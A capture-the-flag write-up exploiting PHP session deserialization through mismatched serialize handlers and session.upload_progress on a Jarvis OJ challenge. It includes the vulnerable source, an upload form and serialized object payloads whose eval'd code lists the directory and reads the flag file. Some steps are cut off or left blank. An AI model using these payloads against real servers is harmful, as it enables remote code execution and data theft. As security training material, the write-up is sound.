This write-up solves the following challenge:
http://web.jarvisoj.com:32784/
Approach:
1. session.upload_progress.enabled=On
When
The solution steps are as follows:
1. Open the address and obtain the following source code:
    <?php
    //A webshell is wait for you
    ini_set('session.serialize_handler', 'php');
    session_start();
    class OowoO
    {
        public $mdzz;
        function __construct()
        {
            $this->mdzz = 'phpinfo();';
        }
        function __destruct()
        {
            eval($this->mdzz);
        }
    }
    if(isset($_GET['phpinfo']))
    {
        $m = new OowoO();
    }
    else
    {
        highlight_string(file_get_contents('index.php'));
    }
    ?>
Open the following address directly:
http://web.jarvisoj.com:32784/?phpinfo and look at the phpinfo page: php.ini sets session.serialize_handler to php_serialize by default, while index.php sets it to php. This handler mismatch is what causes the session deserialization problem.
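To make the handler mismatch concrete, here is an added example (not code from the original write-up or the challenge) that encodes the same session data with both handler formats and then shows how a record written under php_serialize is reinterpreted when read back by the php handler; the session values are constructed, and object instantiation is disabled in the reader.

```php
<?php
// Added example, not from the original write-up: the same $_SESSION data
// stored by the two serialize handlers, and what happens when a record written
// under php_serialize is read back under php. Sample values are constructed.

// session.serialize_handler = php stores "key|serialize(value)" per entry.
function encode_php(array $session): string {
    $out = '';
    foreach ($session as $k => $v) {
        $out .= $k . '|' . serialize($v);
    }
    return $out;
}

// session.serialize_handler = php_serialize stores one serialized array.
function encode_php_serialize(array $session): string {
    return serialize($session);
}

// Minimal reader for the php format: the text before the first '|' is the
// key, everything after it is passed to unserialize(). Objects are disallowed
// here so the demo only shows the parsing confusion and never instantiates one.
function decode_php_first_entry(string $data): array {
    $pos = strpos($data, '|');
    if ($pos === false) {
        return [];
    }
    $value = @unserialize(substr($data, $pos + 1), ['allowed_classes' => false]);
    return [substr($data, 0, $pos) => $value];
}

$session = ['f' => 'a|i:1;'];   // constructed: a user-controlled value containing '|'

echo encode_php($session), "\n";            // f|s:6:"a|i:1;";
$record = encode_php_serialize($session);
echo $record, "\n";                         // a:1:{s:1:"f";s:6:"a|i:1;";}

// Reading the php_serialize record with the php handler: the '|' inside the
// user value becomes the key/value boundary, and the tail "i:1;" is
// unserialized as the integer 1 instead of staying part of the string.
var_dump(decode_php_first_entry($record));

// Hardening: keep session.serialize_handler identical for every script that
// shares the session store (do not override it with ini_set() per file), and
// leave session.upload_progress.enabled off when upload progress is unused.
```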
2. Use session.upload_progress.enabled to construct the session
First build the upload form:
    <!DOCTYPE html>
    <html>
    <head>
        <title>test XXE</title>
        <meta charset="utf-8">
    </head>
    <body>
        <form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data"><!-- do not encode characters -->
            <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
            <input type="file" name="file" />
            <input type="submit" value="go" />
        </form>
    </body>
    </html>
The code that generates the serialized payload is as follows:
    <?php
    class OowoO
    {
        public $mdzz = 'print_r(scandir(dirname(__FILE__)));';
    }
    $obj = new OowoO();
    $a = serialize($obj);
    var_dump($a);
Running it yields the serialized value:
O:5:"OowoO":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}
Intercept the request and change the file name as follows:
The server response shows that the flag-related file is named: Here_1s_7he_fl4g_buT_You_Cannot_see.php
Obtain the file path:
/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php
Use the following code to build the serialized value that reads the flag:
    <?php
    class OowoO
    {
        public $mdzz = 'print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));';
    }
    $obj = new OowoO();
    $a = serialize($obj);
    var_dump($a);
The serialized result is:
O:5:"OowoO":1:{s:4:"mdzz";s:88:"print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));";}
Replay the request and obtain the flag: